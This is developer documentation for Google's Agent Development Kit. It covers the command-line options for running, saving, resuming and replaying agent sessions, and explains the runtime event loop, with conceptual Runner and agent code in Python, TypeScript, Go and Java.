ADK provides an interactive terminal interface for testing your agents. This is useful for quick testing, scripted interactions, and CI/CD pipelines.
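For scripted interactions in CI, the input file consumed by `adk run --replay` (covered under "Replay sessions" on this page) can be generated programmatically. The following is a minimal sketch, not part of ADK: the helper names `write_replay_input` and `replay_command` are hypothetical, and the only assumptions taken from this page are the `state` and `queries` keys and the `adk run --replay <input> <agent>` argument order.

```python
import json
import tempfile
from pathlib import Path
from typing import Dict, List


def write_replay_input(path: Path, state: Dict[str, object], queries: List[str]) -> Path:
    """Write a replay input file containing the initial state and the queries (hypothetical helper)."""
    path.write_text(json.dumps({"state": state, "queries": queries}, indent=2))
    return path


def replay_command(input_file: Path, agent_dir: str) -> List[str]:
    """Build the argument list for a non-interactive replay run (hypothetical helper)."""
    return ["adk", "run", "--replay", str(input_file), agent_dir]


# Write the input file to a temporary directory and build the command.
tmp_dir = Path(tempfile.mkdtemp())
input_file = write_replay_input(
    tmp_dir / "input.json",
    state={"key": "value"},
    queries=["What is 2 + 2?", "What is the capital of France?"],
)
command = replay_command(input_file, "path/to/my_agent")
print(" ".join(command))
```

In a pipeline, the resulting list could be passed to `subprocess.run(command, check=True)`; the sketch stops short of that so it runs without ADK installed.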
## Run an agent

Use the command for your language to run your agent from the ADK command line interface:

**Python**

```shell
adk run my_agent
```

**TypeScript**

```shell
npx @google/adk-devtools run agent.ts
```

**Go**

```shell
go run agent.go
```

**Java**

Create an `AgentCliRunner` class (see [Java Quickstart](https://google.github.io/adk-docs/get-started/java/index.md)) and run:

```shell
mvn compile exec:java -Dexec.mainClass="com.example.agent.AgentCliRunner"
```

This starts an interactive session where you can type queries and see agent responses directly in your terminal:

```shell
Running agent my_agent, type exit to exit.
[user]: What's the weather in New York?
[my_agent]: The weather in New York is sunny with a temperature of 25°C.
[user]: exit
```

## Session options

The `adk run` command includes options for saving, resuming, and replaying sessions.

### Save sessions

To save the session when you exit:

```shell
adk run --save_session path/to/my_agent
```

You'll be prompted to enter a session ID, and the session will be saved to `path/to/my_agent/<session_id>.session.json`. You can also specify the session ID upfront:

```shell
adk run --save_session --session_id my_session path/to/my_agent
```

### Resume sessions

To continue a previously saved session:

```shell
adk run --resume path/to/my_agent/my_session.session.json path/to/my_agent
```

This loads the previous session state and event history, displays it, and allows you to continue the conversation.
### Replay sessions

To replay a session file without interactive input:

```shell
adk run --replay path/to/input.json path/to/my_agent
```

The input file should contain initial state and queries:

```json
{
  "state": {"key": "value"},
  "queries": ["What is 2 + 2?", "What is the capital of France?"]
}
```

## Storage options

| Option                   | Description                 | Default                        |
| ------------------------ | --------------------------- | ------------------------------ |
| `--session_service_uri`  | Custom session storage URI  | SQLite under `.adk/session.db` |
| `--artifact_service_uri` | Custom artifact storage URI | Local `.adk/artifacts`         |

### Example with storage options

```shell
adk run --session_service_uri "sqlite:///my_sessions.db" path/to/my_agent
```

## All options

| Option                   | Description                                      |
| ------------------------ | ------------------------------------------------ |
| `--save_session`         | Save the session to a JSON file on exit          |
| `--session_id`           | Session ID to use when saving                    |
| `--resume`               | Path to a saved session file to resume           |
| `--replay`               | Path to an input file for non-interactive replay |
| `--session_service_uri`  | Custom session storage URI                       |
| `--artifact_service_uri` | Custom artifact storage URI                      |

# Runtime Event Loop

Supported in ADK: Python v0.1.0, TypeScript v0.2.0, Go v0.1.0, Java v0.1.0

The ADK Runtime is the underlying engine that powers your agent application during user interactions. It's the system that takes your defined agents, tools, and callbacks and orchestrates their execution in response to user input, managing the flow of information, state changes, and interactions with external services like LLMs or storage.

Think of the Runtime as the **"engine"** of your agentic application. You define the parts (agents, tools), and the Runtime handles how they connect and run together to fulfill a user's request.

## Core Idea: The Event Loop

At its heart, the ADK Runtime operates on an **Event Loop**.
This loop facilitates a back-and-forth communication between the `Runner` component and your defined "Execution Logic" (which includes your Agents, the LLM calls they make, Callbacks, and Tools). In simple terms: 1. The `Runner` receives a user query and asks the main `Agent` to start processing. 1. The `Agent` (and its associated logic) runs until it has something to report (like a response, a request to use a tool, or a state change) – it then **yields** or **emits** an `Event`. 1. The `Runner` receives this `Event`, processes any associated actions (like saving state changes via `Services`), and forwards the event onwards (e.g., to the user interface). 1. The `Agent`'s logic **resumes** from where it paused only *after* the `Runner` has processed the event, and then potentially sees the effects of the changes committed by the Runner. 1. This cycle repeats until the agent has no more events to yield for the current user query. This event-driven loop is the fundamental pattern governing how ADK executes your agent code. ## The Heartbeat: The Event Loop - Inner workings The Event Loop is the core operational pattern defining the interaction between the `Runner` and your custom code (Agents, Tools, Callbacks, collectively referred to as "Execution Logic" or "Logic Components" in the design document). It establishes a clear division of responsibilities: Note The specific method names and parameter names may vary slightly by SDK language (e.g., `agent.run_async(...)` in Python, `agent.Run(...)` in Go, `agent.runAsync(...)` in Java and TypeScript). Refer to the language-specific API documentation for details. ### Runner's Role (Orchestrator) The `Runner` acts as the central coordinator for a single user invocation. Its responsibilities in the loop are: 1. **Initiation:** Receives the end user's query (`new_message`) and typically appends it to the session history via the `SessionService`. 1. 
**Kick-off:** Starts the event generation process by calling the main agent's execution method (e.g., `agent_to_run.run_async(...)`). 1. **Receive & Process:** Waits for the agent logic to `yield` or `emit` an `Event`. Upon receiving an event, the Runner **promptly processes** it. This involves: - Using configured `Services` (`SessionService`, `ArtifactService`, `MemoryService`) to commit changes indicated in `event.actions` (like `state_delta`, `artifact_delta`). - Performing other internal bookkeeping. 1. **Yield Upstream:** Forwards the processed event onwards (e.g., to the calling application or UI for rendering). 1. **Iterate:** Signals the agent logic that processing is complete for the yielded event, allowing it to resume and generate the *next* event. *Conceptual Runner Loop:* ```py # Simplified view of Runner's main loop logic (an async generator, because it consumes the agent's events with `async for`) async def run_async(new_query, ...) -> AsyncGenerator[Event, None]: # 1. Append new_query to session event history (via SessionService) session_service.append_event(session, Event(author='user', content=new_query)) # 2. Kick off event loop by calling the agent agent_event_generator = agent_to_run.run_async(context) async for event in agent_event_generator: # 3. Process the generated event and commit changes session_service.append_event(session, event) # Commits state/artifact deltas etc. # memory_service.update_memory(...) # If applicable # artifact_service might have already been called via context during agent run # 4. Yield event for upstream processing (e.g., UI rendering) yield event # Runner implicitly signals agent generator can continue after yielding ``` ```typescript // Simplified view of Runner's main loop logic async * runAsync(newQuery: Content, ...): AsyncGenerator<Event> { // 1. Append newQuery to session event history (via SessionService) await sessionService.appendEvent({ session, event: createEvent({author: 'user', content: newQuery}) }); // 2. 
Kick off event loop by calling the agent const agentEventGenerator = agentToRun.runAsync(context); for await (const event of agentEventGenerator) { // 3. Process the generated event and commit changes // Commits state/artifact deltas etc. await sessionService.appendEvent({session, event}); // memoryService.updateMemory(...) // If applicable // artifactService might have already been called via context during agent run // 4. Yield event for upstream processing (e.g., UI rendering) yield event; // Runner implicitly signals agent generator can continue after yielding } } ``` ```go // Simplified conceptual view of the Runner's main loop logic in Go func (r *Runner) RunConceptual(ctx context.Context, session *session.Session, newQuery *genai.Content) iter.Seq2[*Event, error] { return func(yield func(*Event, error) bool) { // 1. Append new_query to session event history (via SessionService) // ... userEvent := session.NewEvent(ctx.InvocationID()) // Simplified for conceptual view userEvent.Author = "user" userEvent.LLMResponse = model.LLMResponse{Content: newQuery} if _, err := r.sessionService.Append(ctx, &session.AppendRequest{Event: userEvent}); err != nil { yield(nil, err) return } // 2. Kick off event stream by calling the agent // Assuming agent.Run also returns iter.Seq2[*Event, error] agentEventsAndErrs := r.agent.Run(ctx, &agent.RunRequest{Session: session, Input: newQuery}) for event, err := range agentEventsAndErrs { if err != nil { if !yield(event, err) { // Yield event even if there's an error, then stop return } return // Agent finished with an error } // 3. Process the generated event and commit changes // Only commit non-partial event to a session service (as seen in actual code) if !event.LLMResponse.Partial { if _, err := r.sessionService.Append(ctx, &session.AppendRequest{Event: event}); err != nil { yield(nil, err) return } } // memory_service.update_memory(...) 
// If applicable // artifact_service might have already been called via context during agent run // 4. Yield event for upstream processing if !yield(event, nil) { return // Upstream consumer stopped } } // Agent finished successfully } } ``` ```java // Simplified conceptual view of the Runner's main loop logic in Java. public Flowable runConceptual( Session session, InvocationContext invocationContext, Content newQuery ) { // 1. Append new_query to session event history (via SessionService) // ... sessionService.appendEvent(session, userEvent).blockingGet(); // 2. Kick off event stream by calling the agent Flowable agentEventStream = agentToRun.runAsync(invocationContext); // 3. Process each generated event, commit changes, and "yield" or "emit" return agentEventStream.map(event -> { // This mutates the session object (adds event, applies stateDelta). // The return value of appendEvent (a Single) is conceptually // just the event itself after processing. sessionService.appendEvent(session, event).blockingGet(); // Simplified blocking call // memory_service.update_memory(...) // If applicable - conceptual // artifact_service might have already been called via context during agent run // 4. "Yield" event for upstream processing // In RxJava, returning the event in map effectively yields it to the next operator or subscriber. return event; }); } ``` ### Execution Logic's Role (Agent, Tool, Callback) Your code within agents, tools, and callbacks is responsible for the actual computation and decision-making. Its interaction with the loop involves: 1. **Execute:** Runs its logic based on the current `InvocationContext`, including the session state *as it was when execution resumed*. 1. **Yield:** When the logic needs to communicate (send a message, call a tool, report a state change), it constructs an `Event` containing the relevant content and actions, and then `yield`s this event back to the `Runner`. 1. 
**Pause:** Crucially, execution of the agent logic **pauses immediately** after the `yield` statement (or `return` in RxJava). It waits for the `Runner` to complete step 3 (processing and committing). 1. **Resume:** *Only after* the `Runner` has processed the yielded event does the agent logic resume execution from the statement immediately following the `yield`. 1. **See Updated State:** Upon resumption, the agent logic can now reliably access the session state (`ctx.session.state`) reflecting the changes that were committed by the `Runner` from the *previously yielded* event. *Conceptual Execution Logic:* ```py # Simplified view of logic inside Agent.run_async, callbacks, or tools # ... previous code runs based on current state ... # 1. Determine a change or output is needed, construct the event # Example: Updating state update_data = {'field_1': 'value_2'} event_with_state_change = Event( author=self.name, actions=EventActions(state_delta=update_data), content=types.Content(parts=[types.Part(text="State updated.")]) # ... other event fields ... ) # 2. Yield the event to the Runner for processing & commit yield event_with_state_change # <<<<<<<<<<<< EXECUTION PAUSES HERE >>>>>>>>>>>> # <<<<<<<<<<<< RUNNER PROCESSES & COMMITS THE EVENT >>>>>>>>>>>> # 3. Resume execution ONLY after Runner is done processing the above event. # Now, the state committed by the Runner is reliably reflected. # Subsequent code can safely assume the change from the yielded event happened. val = ctx.session.state['field_1'] # here `val` is guaranteed to be "value_2" (assuming Runner committed successfully) print(f"Resumed execution. Value of field_1 is now: {val}") # ... subsequent code continues ... # Maybe yield another event later... ``` ```typescript // Simplified view of logic inside Agent.runAsync, callbacks, or tools // ... previous code runs based on current state ... // 1. 
Determine a change or output is needed, construct the event // Example: Updating state const updateData = {'field_1': 'value_2'}; const eventWithStateChange = createEvent({ author: this.name, actions: createEventActions({stateDelta: updateData}), content: {parts: [{text: "State updated."}]} // ... other event fields ... }); // 2. Yield the event to the Runner for processing & commit yield eventWithStateChange; // <<<<<<<<<<<< EXECUTION PAUSES HERE >>>>>>>>>>>> // <<<<<<<<<<<< RUNNER PROCESSES & COMMITS THE EVENT >>>>>>>>>>>> // 3. Resume execution ONLY after Runner is done processing the above event. // Now, the state committed by the Runner is reliably reflected. // Subsequent code can safely assume the change from the yielded event happened. const val = ctx.session.state['field_1']; // here `val` is guaranteed to be "value_2" (assuming Runner committed successfully) console.log(`Resumed execution. Value of field_1 is now: ${val}`); // ... subsequent code continues ... // Maybe yield another event later... ``` ```go // Simplified view of logic inside Agent.Run, callbacks, or tools // ... previous code runs based on current state ... // 1. Determine a change or output is needed, construct the event // Example: Updating state updateData := map[string]interface{}{"field_1": "value_2"} eventWithStateChange := &Event{ Author: self.Name(), Actions: &EventActions{StateDelta: updateData}, Content: genai.NewContentFromText("State updated.", "model"), // ... other event fields ... } // 2. Yield the event to the Runner for processing & commit // In Go, this is done by sending the event to a channel. eventsChan <- eventWithStateChange // <<<<<<<<<<<< EXECUTION PAUSES HERE (conceptually) >>>>>>>>>>>> // The Runner on the other side of the channel will receive and process the event. // The agent's goroutine might continue, but the logical flow waits for the next input or step. // <<<<<<<<<<<< RUNNER PROCESSES & COMMITS THE EVENT >>>>>>>>>>>> // 3. 
Resume execution ONLY after Runner is done processing the above event. // In a real Go implementation, this would likely be handled by the agent receiving // a new RunRequest or context indicating the next step. The updated state // would be part of the session object in that new request. // For this conceptual example, we'll just check the state. val := ctx.State.Get("field_1") // here `val` is guaranteed to be "value_2" because the Runner would have // updated the session state before calling the agent again. fmt.Printf("Resumed execution. Value of field_1 is now: %v\n", val) // ... subsequent code continues ... // Maybe send another event to the channel later... ``` ```java // Simplified view of logic inside Agent.runAsync, callbacks, or tools // ... previous code runs based on current state ... // 1. Determine a change or output is needed, construct the event // Example: Updating state ConcurrentMap updateData = new ConcurrentHashMap<>(); updateData.put("field_1", "value_2"); EventActions actions = EventActions.builder().stateDelta(updateData).build(); Content eventContent = Content.builder().parts(Part.fromText("State updated.")).build(); Event eventWithStateChange = Event.builder() .author(self.name()) .actions(actions) .content(Optional.of(eventContent)) // ... other event fields ... .build(); // 2. "Yield" the event. In RxJava, this means emitting it into the stream. // The Runner (or upstream consumer) will subscribe to this Flowable. // When the Runner receives this event, it will process it (e.g., call sessionService.appendEvent). // The 'appendEvent' in Java ADK mutates the 'Session' object held within 'ctx' (InvocationContext). // <<<<<<<<<<<< CONCEPTUAL PAUSE POINT >>>>>>>>>>>> // In RxJava, the emission of 'eventWithStateChange' happens, and then the stream // might continue with a 'flatMap' or 'concatMap' operator that represents // the logic *after* the Runner has processed this event. 
// To model the "resume execution ONLY after Runner is done processing": // The Runner's `appendEvent` is usually an async operation itself (returns Single). // The agent's flow needs to be structured such that subsequent logic // that depends on the committed state runs *after* that `appendEvent` completes. // This is how the Runner typically orchestrates it: // Runner: // agent.runAsync(ctx) // .concatMapEager(eventFromAgent -> // sessionService.appendEvent(ctx.session(), eventFromAgent) // This updates ctx.session().state() // .toFlowable() // Emits the event after it's processed // ) // .subscribe(processedEvent -> { /* UI renders processedEvent */ }); // So, within the agent's own logic, if it needs to do something *after* an event it yielded // has been processed and its state changes are reflected in ctx.session().state(), // that subsequent logic would typically be in another step of its reactive chain. // For this conceptual example, we'll emit the event, and then simulate the "resume" // as a subsequent operation in the Flowable chain. return Flowable.just(eventWithStateChange) // Step 2: Yield the event .concatMap(yieldedEvent -> { // <<<<<<<<<<<< RUNNER CONCEPTUALLY PROCESSES & COMMITS THE EVENT >>>>>>>>>>>> // At this point, in a real runner, ctx.session().appendEvent(yieldedEvent) would have been called // by the Runner, and ctx.session().state() would be updated. // Since we are *inside* the agent's conceptual logic trying to model this, // we assume the Runner's action has implicitly updated our 'ctx.session()'. // 3. Resume execution. // Now, the state committed by the Runner (via sessionService.appendEvent) // is reliably reflected in ctx.session().state(). Object val = ctx.session().state().get("field_1"); // here `val` is guaranteed to be "value_2" because the `sessionService.appendEvent` // called by the Runner would have updated the session state within the `ctx` object. System.out.println("Resumed execution. 
Value of field_1 is now: " + val); // ... subsequent code continues ... // If this subsequent code needs to yield another event, it would do so here. ``` This cooperative yield/pause/resume cycle between the `Runner` and your Execution Logic, mediated by `Event` objects, forms the core of the ADK Runtime. ## Key components of the Runtime Several components work together within the ADK Runtime to execute an agent invocation. Understanding their roles clarifies how the event loop functions: 1. ### `Runner` - **Role:** The main entry point and orchestrator for a single user query (`run_async`). - **Function:** Manages the overall Event Loop, receives events yielded by the Execution Logic, coordinates with Services to process and commit event actions (state/artifact changes), and forwards processed events upstream (e.g., to the UI). It essentially drives the conversation turn by turn based on yielded events. (Defined in `google.adk.runners.runner`). 1. ### Execution Logic Components - **Role:** The parts containing your custom code and the core agent capabilities. - **Components:** - `Agent` (`BaseAgent`, `LlmAgent`, etc.): Your primary logic units that process information and decide on actions. They implement the `_run_async_impl` method which yields events. - `Tools` (`BaseTool`, `FunctionTool`, `AgentTool`, etc.): External functions or capabilities used by agents (often `LlmAgent`) to interact with the outside world or perform specific tasks. They execute and return results, which are then wrapped in events. - `Callbacks` (Functions): User-defined functions attached to agents (e.g., `before_agent_callback`, `after_model_callback`) that hook into specific points in the execution flow, potentially modifying behavior or state, whose effects are captured in events. - **Function:** Perform the actual thinking, calculation, or external interaction. They communicate their results or needs by **yielding `Event` objects** and pausing until the Runner processes them. 1. 
### `Event` - **Role:** The message passed back and forth between the `Runner` and the Execution Logic. - **Function:** Represents an atomic occurrence (user input, agent text, tool call/result, state change request, control signal). It carries both the content of the occurrence and the intended side effects (`actions` like `state_delta`). 1. ### `Services` - **Role:** Backend components responsible for managing persistent or shared resources. Used primarily by the `Runner` during event processing. - **Components:** - `SessionService` (`BaseSessionService`, `InMemorySessionService`, etc.): Manages `Session` objects, including saving/loading them, applying `state_delta` to the session state, and appending events to the `event history`. - `ArtifactService` (`BaseArtifactService`, `InMemoryArtifactService`, `GcsArtifactService`, etc.): Manages the storage and retrieval of binary artifact data. Although `save_artifact` is called via context during execution logic, the `artifact_delta` in the event confirms the action for the Runner/SessionService. - `MemoryService` (`BaseMemoryService`, etc.): (Optional) Manages long-term semantic memory across sessions for a user. - **Function:** Provide the persistence layer. The `Runner` interacts with them to ensure changes signaled by `event.actions` are reliably stored *before* the Execution Logic resumes. 1. ### `Session` - **Role:** A data container holding the state and history for *one specific conversation* between a user and the application. - **Function:** Stores the current `state` dictionary, the list of all past `events` (`event history`), and references to associated artifacts. It's the primary record of the interaction, managed by the `SessionService`. 1. ### `Invocation` - **Role:** A conceptual term representing everything that happens in response to a *single* user query, from the moment the `Runner` receives it until the agent logic finishes yielding events for that query. 
- **Function:** An invocation might involve multiple agent runs (if using agent transfer or `AgentTool`), multiple LLM calls, tool executions, and callback executions, all tied together by a single `invocation_id` within the `InvocationContext`. State variables prefixed with `temp:` are strictly scoped to a single invocation and discarded afterwards. These players interact continuously through the Event Loop to process a user's request. ## How It Works: A Simplified Invocation Let's trace a simplified flow for a typical user query that involves an LLM agent calling a tool: ### Step-by-Step Breakdown 1. **User Input:** The User sends a query (e.g., "What's the capital of France?"). 1. **Runner Starts:** `Runner.run_async` begins. It interacts with the `SessionService` to load the relevant `Session` and adds the user query as the first `Event` to the session history. An `InvocationContext` (`ctx`) is prepared. 1. **Agent Execution:** The `Runner` calls `agent.run_async(ctx)` on the designated root agent (e.g., an `LlmAgent`). 1. **LLM Call (Example):** The `Agent_Llm` determines it needs information, perhaps by calling a tool. It prepares a request for the `LLM`. Let's assume the LLM decides to call `MyTool`. 1. **Yield FunctionCall Event:** The `Agent_Llm` receives the `FunctionCall` response from the LLM, wraps it in an `Event(author='Agent_Llm', content=Content(parts=[Part(function_call=...)]))`, and `yields` or `emits` this event. 1. **Agent Pauses:** The `Agent_Llm`'s execution pauses immediately after the `yield`. 1. **Runner Processes:** The `Runner` receives the FunctionCall event. It passes it to the `SessionService` to record it in the history. The `Runner` then yields the event upstream to the `User` (or application). 1. **Agent Resumes:** The `Runner` signals that the event is processed, and `Agent_Llm` resumes execution. 1. **Tool Execution:** The `Agent_Llm`'s internal flow now proceeds to execute the requested `MyTool`. It calls `tool.run_async(...)`. 
1. **Tool Returns Result:** `MyTool` executes and returns its result (e.g., `{'result': 'Paris'}`). 1. **Yield FunctionResponse Event:** The agent (`Agent_Llm`) wraps the tool result into an `Event` containing a `FunctionResponse` part (e.g., `Event(author='Agent_Llm', content=Content(role='user', parts=[Part(function_response=...)]))`). This event might also contain `actions` if the tool modified state (`state_delta`) or saved artifacts (`artifact_delta`). The agent `yield`s this event. 1. **Agent Pauses:** `Agent_Llm` pauses again. 1. **Runner Processes:** `Runner` receives the FunctionResponse event. It passes it to `SessionService` which applies any `state_delta`/`artifact_delta` and adds the event to history. `Runner` yields the event upstream. 1. **Agent Resumes:** `Agent_Llm` resumes, now knowing the tool result and any state changes are committed. 1. **Final LLM Call (Example):** `Agent_Llm` sends the tool result back to the `LLM` to generate a natural language response. 1. **Yield Final Text Event:** `Agent_Llm` receives the final text from the `LLM`, wraps it in an `Event(author='Agent_Llm', content=Content(parts=[Part(text=...)]))`, and `yield`s it. 1. **Agent Pauses:** `Agent_Llm` pauses. 1. **Runner Processes:** `Runner` receives the final text event, passes it to `SessionService` for history, and yields it upstream to the `User`. This is likely marked as the `is_final_response()`. 1. **Agent Resumes & Finishes:** `Agent_Llm` resumes. Having completed its task for this invocation, its `run_async` generator finishes. 1. **Runner Completes:** The `Runner` sees the agent's generator is exhausted and finishes its loop for this invocation. This yield/pause/process/resume cycle ensures that state changes are consistently applied and that the execution logic always operates on the most recently committed state after yielding an event. 
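
The yield/pause/process/resume cycle traced above can be imitated with a plain Python generator. The sketch below does not use the ADK API: `ToyEvent`, `ToySession`, `toy_agent`, and `toy_runner` are hypothetical stand-ins introduced only to show that the agent's code after a `yield` runs once the runner has committed the yielded event's state delta.

```python
from dataclasses import dataclass, field
from typing import Dict, Iterator, List


@dataclass
class ToyEvent:
    """Hypothetical stand-in for an Event: some text plus a requested state delta."""
    author: str
    text: str
    state_delta: Dict[str, object] = field(default_factory=dict)


@dataclass
class ToySession:
    """Hypothetical stand-in for a Session: committed state and event history."""
    state: Dict[str, object] = field(default_factory=dict)
    events: List[ToyEvent] = field(default_factory=list)


def toy_agent(session: ToySession) -> Iterator[ToyEvent]:
    """Execution logic: emits events and pauses at each yield."""
    yield ToyEvent("agent", "calling tool", {"status": "processing"})
    # Execution resumes here only after the runner has committed the delta above.
    seen = session.state["status"]
    yield ToyEvent("agent", f"resumed with status={seen}", {"status": "done"})


def toy_runner(session: ToySession, query: str) -> Iterator[ToyEvent]:
    """Runner: records the query, then commits each event before forwarding it."""
    session.events.append(ToyEvent("user", query))
    for event in toy_agent(session):
        session.state.update(event.state_delta)  # commit state changes
        session.events.append(event)             # record the event in history
        yield event                              # forward upstream (e.g., to a UI)


session = ToySession()
for ev in toy_runner(session, "What's the capital of France?"):
    print(f"[{ev.author}] {ev.text}")
```

The second event reports `status=processing` because the runner applied the first event's delta before the generator was advanced again; the real Runner additionally persists changes through a `SessionService`, which this toy version omits.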
## Important Runtime Behaviors Understanding a few key aspects of how the ADK Runtime handles state, streaming, and asynchronous operations is crucial for building predictable and efficient agents. ### State Updates & Commitment Timing - **The Rule:** When your code (in an agent, tool, or callback) modifies the session state (e.g., `context.state['my_key'] = 'new_value'`), this change is initially recorded locally within the current `InvocationContext`. The change is only **guaranteed to be persisted** (saved by the `SessionService`) *after* the `Event` carrying the corresponding `state_delta` in its `actions` has been `yield`-ed by your code and subsequently processed by the `Runner`. - **Implication:** Code that runs *after* resuming from a `yield` can reliably assume that the state changes signaled in the *yielded event* have been committed. ```py # Inside agent logic (conceptual) # 1. Modify state ctx.session.state['status'] = 'processing' event1 = Event(..., actions=EventActions(state_delta={'status': 'processing'})) # 2. Yield event with the delta yield event1 # --- PAUSE --- Runner processes event1, SessionService commits 'status' = 'processing' --- # 3. Resume execution # Now it's safe to rely on the committed state current_status = ctx.session.state['status'] # Guaranteed to be 'processing' print(f"Status after resuming: {current_status}") ``` ```typescript // Inside agent logic (conceptual) // 1. Modify state // In TypeScript, you modify state via the context, which tracks the change. ctx.state.set('status', 'processing'); // The framework will automatically populate actions with the state // delta from the context. For illustration, it's shown here. const event1 = createEvent({ actions: createEventActions({stateDelta: {'status': 'processing'}}), // ... other event fields }); // 2. Yield event with the delta yield event1; // --- PAUSE --- Runner processes event1, SessionService commits 'status' = 'processing' --- // 3. 
Resume execution // Now it's safe to rely on the committed state in the session object. const currentStatus = ctx.session.state['status']; // Guaranteed to be 'processing' console.log(`Status after resuming: ${currentStatus}`); ``` ```go // Inside agent logic (conceptual) func (a *Agent) RunConceptual(ctx agent.InvocationContext) iter.Seq2[*session.Event, error] { // The entire logic is wrapped in a function that will be returned as an iterator. return func(yield func(*session.Event, error) bool) { // ... previous code runs based on current state from the input `ctx` ... // e.g., val := ctx.State().Get("field_1") might return "value_1" here. // 1. Determine a change or output is needed, construct the event updateData := map[string]interface{}{"field_1": "value_2"} eventWithStateChange := session.NewEvent(ctx.InvocationID()) eventWithStateChange.Author = a.Name() eventWithStateChange.Actions = &session.EventActions{StateDelta: updateData} // ... other event fields ... // 2. Yield the event to the Runner for processing & commit. // The agent's execution continues immediately after this call. if !yield(eventWithStateChange, nil) { // If yield returns false, it means the consumer (the Runner) // has stopped listening, so we should stop producing events. return } // <<<<<<<<<<<< RUNNER PROCESSES & COMMITS THE EVENT >>>>>>>>>>>> // This happens outside the agent, after the agent's iterator has // produced the event. // 3. The agent CANNOT immediately see the state change it just yielded. // The state is immutable within a single `Run` invocation. val := ctx.State().Get("field_1") // `val` here is STILL "value_1" (or whatever it was at the start). // The updated state ("value_2") will only be available in the `ctx` // of the *next* `Run` invocation in a subsequent turn. // ... subsequent code continues, potentially yielding more events ... finalEvent := session.NewEvent(ctx.InvocationID()) finalEvent.Author = a.Name() // ... 
yield(finalEvent, nil) } } ``` ```java // Inside agent logic (conceptual) // ... previous code runs based on current state ... // 1. Prepare state modification and construct the event ConcurrentHashMap stateChanges = new ConcurrentHashMap<>(); stateChanges.put("status", "processing"); EventActions actions = EventActions.builder().stateDelta(stateChanges).build(); Content content = Content.builder().parts(Part.fromText("Status update: processing")).build(); Event event1 = Event.builder() .actions(actions) // ... .build(); // 2. Yield event with the delta return Flowable.just(event1) .map( emittedEvent -> { // --- CONCEPTUAL PAUSE & RUNNER PROCESSING --- // 3. Resume execution (conceptually) // Now it's safe to rely on the committed state. String currentStatus = (String) ctx.session().state().get("status"); System.out.println("Status after resuming (inside agent logic): " + currentStatus); // Guaranteed to be 'processing' // The event itself (event1) is passed on. // If subsequent logic within this agent step produced *another* event, // you'd use concatMap to emit that new event. return emittedEvent; }); // ... subsequent agent logic might involve further reactive operators // or emitting more events based on the now-updated `ctx.session().state()`. ``` ### "Dirty Reads" of Session State - **Definition:** While commitment happens *after* the yield, code running *later within the same invocation*, but *before* the state-changing event is actually yielded and processed, **can often see the local, uncommitted changes**. This is sometimes called a "dirty read". - **Example:** ```py # Code in before_agent_callback callback_context.state['field_1'] = 'value_1' # State is locally set to 'value_1', but not yet committed by Runner # ... agent runs ... # Code in a tool called later *within the same invocation* # Readable (dirty read), but 'value_1' isn't guaranteed persistent yet. 
val = tool_context.state['field_1'] # 'val' will likely be 'value_1' here print(f"Dirty read value in tool: {val}") # Assume the event carrying the state_delta={'field_1': 'value_1'} # is yielded *after* this tool runs and is processed by the Runner. ``` ```typescript // Code in beforeAgentCallback callbackContext.state.set('field_1', 'value_1'); // State is locally set to 'value_1', but not yet committed by Runner // --- agent runs ... --- // --- Code in a tool called later *within the same invocation* --- // Readable (dirty read), but 'value_1' isn't guaranteed persistent yet. const val = toolContext.state.get('field_1'); // 'val' will likely be 'value_1' here console.log(`Dirty read value in tool: ${val}`); // Assume the event carrying the state_delta={'field_1': 'value_1'} // is yielded *after* this tool runs and is processed by the Runner. ``` ```go // Code in before_agent_callback // The callback would modify the context's session state directly. // This change is local to the current invocation context. ctx.State.Set("field_1", "value_1") // State is locally set to 'value_1', but not yet committed by Runner // ... agent runs ... // Code in a tool called later *within the same invocation* // Readable (dirty read), but 'value_1' isn't guaranteed persistent yet. val := ctx.State.Get("field_1") // 'val' will likely be 'value_1' here fmt.Printf("Dirty read value in tool: %v\n", val) // Assume the event carrying the state_delta={'field_1': 'value_1'} // is yielded *after* this tool runs and is processed by the Runner. ``` ```java // Modify state - Code in BeforeAgentCallback // AND stages this change in callbackContext.eventActions().stateDelta(). callbackContext.state().put("field_1", "value_1"); // --- agent runs ... --- // --- Code in a tool called later *within the same invocation* --- // Readable (dirty read), but 'value_1' isn't guaranteed persistent yet. 
Object val = toolContext.state().get("field_1"); // 'val' will likely be 'value_1' here System.out.println("Dirty read value in tool: " + val); // Assume the event carrying the state_delta={'field_1': 'value_1'} // is yielded *after* this tool runs and is processed by the Runner. ``` - **Implications:** - **Benefit:** Allows different parts of your logic within a single complex step (e.g., multiple callbacks or tool calls before the next LLM turn) to coordinate using state without waiting for a full yield/commit cycle. - **Caveat:** Relying heavily on dirty reads for critical logic can be risky. If the invocation fails *before* the event carrying the `state_delta` is yielded and processed by the `Runner`, the uncommitted state change will be lost. For critical state transitions, ensure they are associated with an event that gets successfully processed. ### Streaming vs. Non-Streaming Output (`partial=True`) This primarily relates to how responses from the LLM are handled, especially when using streaming generation APIs. - **Streaming:** The LLM generates its response token-by-token or in small chunks. - The framework (often within `BaseLlmFlow`) yields multiple `Event` objects for a single conceptual response. Most of these events will have `partial=True`. - The `Runner`, upon receiving an event with `partial=True`, typically **forwards it immediately** upstream (for UI display) but **skips processing its `actions`** (like `state_delta`). - Eventually, the framework yields a final event for that response, marked as non-partial (`partial=False` or implicitly via `turn_complete=True`). - The `Runner` **fully processes only this final event**, committing any associated `state_delta` or `artifact_delta`. - **Non-Streaming:** The LLM generates the entire response at once. The framework yields a single event marked as non-partial, which the `Runner` processes fully. 
- **Why it Matters:** This ensures that state changes are applied atomically and only once, based on the *complete* response from the LLM, while still allowing the UI to display text progressively as it is generated.

### Async is Primary (`run_async`)

- **Core Design:** The ADK Runtime is fundamentally built on asynchronous patterns and libraries (like Python's `asyncio`, Java's `RxJava`, and native `Promise`s and `AsyncGenerator`s in TypeScript) to handle concurrent operations (like waiting for LLM responses or tool executions) efficiently without blocking.
- **Main Entry Point:** `Runner.run_async` is the primary method for executing agent invocations. All core runnable components (Agents, specific flows) use asynchronous methods internally.
- **Synchronous Convenience (`run`):** A synchronous `Runner.run` method exists mainly for convenience (e.g., in simple scripts or testing environments). Internally, however, `Runner.run` typically just calls `Runner.run_async` and manages the async event loop execution for you.
- **Developer Experience:** We recommend designing your applications (e.g., web servers using ADK) to be asynchronous for best performance. In Python, this means using `asyncio`; in Java, it means using `RxJava`'s reactive programming model; and in TypeScript, it means building on native `Promise`s and `AsyncGenerator`s.
- **Sync Callbacks/Tools:** The ADK framework supports both asynchronous and synchronous functions for tools and callbacks.
